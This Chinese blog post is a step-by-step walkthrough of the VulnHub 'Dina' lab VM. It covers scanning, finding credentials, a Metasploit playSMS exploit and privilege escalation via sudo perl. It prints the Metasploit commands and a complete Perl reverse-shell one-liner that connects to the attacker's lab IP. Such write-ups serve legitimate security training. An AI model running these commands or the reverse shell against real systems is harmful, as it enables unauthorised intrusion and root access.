Dina超详细靶场实战

最新推荐文章于 2024-08-12 00:41:54 发布
最新推荐文章于 2024-08-12 00:41:54 发布
阅读量394 收藏 6
点赞数 5
分类专栏: vulnhub靶机 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68615160/article/details/140856759
版权

一、靶场配置

网卡设置为nat

 二、主机探测与端口扫描

nmap 192.168.121.0/24

 发现开启了80端口

三、web信息收集

 1.目录扫描

dirb http://192.168.121.184

 拼接robots.txt看看

 拼接secure目录

 发现有个备份文件,话不多说,下载看看

解压需要密码,找其他功能点

发现在拼接/nothing的时候,不是一个404页面,查看源代码发现密码信息

 尝试用这些密码解压backup.zip文件,发现freedom可以

解压成功后,是一个视频文件,显示已损坏,我们用记事本打开

 发现了一个url和一个用户,还有一个隐藏的密码

拼接url,获得一个登录页面

 尝试用记事本的用户登录,密码使用之前源码的密码尝试

这里登陆了许久登不上,迫不得已换了个浏览器

最终登陆成功,账号密码如下

touhid
diana

 发现诸多功能点,都未能成功利用,最后想到playSMS框架有Nday

四、getshell

1.利用工具msfconsole

搜索对应框架漏洞

search playSMS

 尝试过后,序号2可以成功利用

use 2
show options

标明yes的均需配置

set targeturi /SecreTSMSgatwayLogin #配置上传文件页面的url

set password diana                  #配置密码
        
set username touhid                 #配置账户
        
set rhosts 192.168.121.184          #靶机ip
        
set lhost 192.168.121.171           #kali监听机的ip
        
set LPORT 1234                      #kali监听的端口
run

开始攻击

 成功获取shell

五、提权

首先获取交互式shell

shell python -c 'import pty; pty.spawn("/bin/bash")'

输入查看具有sudo权限的程序

sudo -l

 发现可以执行perl命令,所有用户均可以执行

通过perl写入反向shell语句

sudo perl -e 'use Socket;$i="192.168.121.171";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 kali监听9999端口,反弹成功

 提权成功!

橙子iiii
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DINA靶场渗透测试(保姆级详细!!)
m0_57867209的博客
03-05 232
关于DINA靶场渗透测试的保姆级详细教程
Vulhub靶场Dina-1.0.1
weixin_45650977的博客
04-30 862
Vulhub靶场Dina-1.0.1 靶机描述 环境准备 vmware15 打开 攻击机:kali NAT模式 靶机:Dina1.0.1 NAT模式
靶机实战-Dina 1.0
滕财然的博客
01-28 1184
Dina 1.0靶机实战 文章目录Dina 1.0靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口--http服务5、提权提权方式二 1、主机发现 目标IP:192.168.232.157 2、端口扫描 3、端口详细信息扫描 只开放80端口 4、访问80端口–http服务 主页啥都没有,直接dirb扫一下目录 依次访问目录: index就是主页,就不看了 发现robo...
dina虚拟服务器,Dina渗透
weixin_29302047的博客
08-10 333
Dian 是一台渗透测试用的虚拟环境,只是用于娱乐的主机,不过玩的还是挺开心的。写点笔记作为参考。使用的网络环境为 NAT 模式。发现目标主机利用扫描工具 nmap 扫描目标网段,寻找存活的目标主机。我的 NAT 模式网段在 192.168.43.1 这个网段上,可以用命令:nmap 192.168.43.0/24扫描目标端内所有的存活主机发现目标主机:192.168.43.130开放端口:80访...
【VulnHub靶机渗透】四:Dina-1
野原新之助
04-13 833
该靶机设定一些线索,引导用户得到相关信息,并使用了一个包含漏洞(代码执行)的Web应用系统版本。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
IRT和DINA模型学习总结
weixin_45127866的博客
04-16 2213
简介 IRT是一种典型的连续型认知诊断模型。IRT模型是用于评估被试对某一项目或某一类项目的潜在特质。在使用IRT模型对被试进行能力评估的过程中,关键在于对参数的估计,包括对项目参数ai、bi、ci、以及被试能力参数θ的估计。 DINA模型是一种典型的离散型认知诊断模型。它有三个核心矩阵,学生试题得分矩阵X,知识点考察矩阵Q,学生知识点掌握矩阵A。 学习文章 IRT DINA ...
靶机2.Dina
wj33333的博客
10-05 136
进入网站。
Dina渗透
ch3cke的博客
02-18 360
title: Dina渗透 date: 2018-12-08 16:35:17 tags: -总结 Dian是一台渗透测试用的虚拟环境,只是用于娱乐的主机,不过玩的还是挺开心的。写点笔记作为参考。使用的网络环境为NAT模式。 发现目标主机 利用扫描工具nmap扫描目标网段,寻找存活的目标主机。我的NAT模式网段在192.168.43.1这个网段上,可以用命令: nmap 192.168.43.0...
DINA Model and Parameter Estimation:A Didactic.pdf
05-30
DINA模型及其参数估计,作者Jimmy de la Torre,发表于2009年,引用数为:385
Dina Translator-开源
07-03
Dina 是 Windows 的翻译器,可以在大多数应用程序中快速翻译文本,例如 Web 浏览器、游戏、Office 应用程序、Messenger 等。该软件随时使用“在线连接”。 因此,它是翻译的先决条件。 合法访问:软件免费版本未获得...
[2015][40]Bayesian estimation of the DINA model with Gibbs sampling.pdf
06-30
使用Gibbs采样对DINA模型进行参数估计,据论文实验结果可以看出,相对于MCMC方法,基于Gibbs采样的方法能获得更高得精度和速度。
dina:CHAT APP
02-08
DINA:CHAT APP】 DINA是一款基于JavaScript技术构建的聊天应用程序。在当前数字化时代,实时通讯已经成为人们日常生活和工作中不可或缺的一部分,而DINA旨在提供一个便捷、高效的沟通平台。这款应用利用...
dina-mediaserver
06-25
================ DINA-WEB - 媒体服务器模块 Mediaserver 是使用以下产品开发的(版本中有明确的产品)。 Maven 用作“项目管理工具”,Maven 获取 Mediaserver 依赖的所有依赖项 - 每个依赖项都在 pom.xml 文件中...
SSH 和 Telnet 之间的区别
ITmoster的博客
08-08 378
SSH 和 Telnet是帮助用户与远程系统建立连接的两种通信协议,这些通信协议决定了数据如何在网络上的不同设备之间传输,这些设备通常需要通过各种物理和数字环境进行传输,网络协议的主要目标是通信、网络管理和安全。
深度解密CRLF注入与重定向漏洞:从原理到实践
2301_80064376的博客
08-08 897
重定向漏洞(Open Redirect)是一种安全漏洞,攻击者可以利用它将用户从受信任的网站重定向到恶意网站。这种漏洞通常出现在网站处理 URL 参数时,没有对用户输入进行适当验证。
开发android app用于移远模块读写IMEI 模组EC200DEULA-D08-SNNDA 支持socket连接读写IMEI
chenhao0568的专栏
08-07 388
发送{“function”: “write_imei”,“imei”: “860004050179648”}响应{“message”: “success”,“imei”: “860004050179648”}当结果正常时message为success,否则message给出英文具体原因,其它参数可能为空。发送{“function”: “read_imei”}响应{“message”: “success”}前面本地5902 转发到 后面设备为5902。PC与终端APP之间 json通信协议。
HAProxy基本配置及参数实操
最新发布
Webston的博客
08-12 777
静态#动态#以下静态和动态取决于hash_type 是否consistentfirst #使用较少static-rr #做了session 共享的web集群leastconn #数据库source#基于客户端公网IP 的会话保持Uri--------------->http #缓存服务器,CDN服务商,蓝汛、百度、阿里云、腾讯url_param--------->http #可以实现session 保持hdr #基于客户端请求报文头部做下一步处理高。
2009年DINA模型详解:参数估计教程
DINA模型及其参数估计是心理学与教育测量领域的一项关键理论,由作者Jimmy de la Torre在2009年的一篇名为《DINAModel and Parameter Estimation: A Didactic》的文章中详细介绍。该模型属于认知诊断理论(Cognitive...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值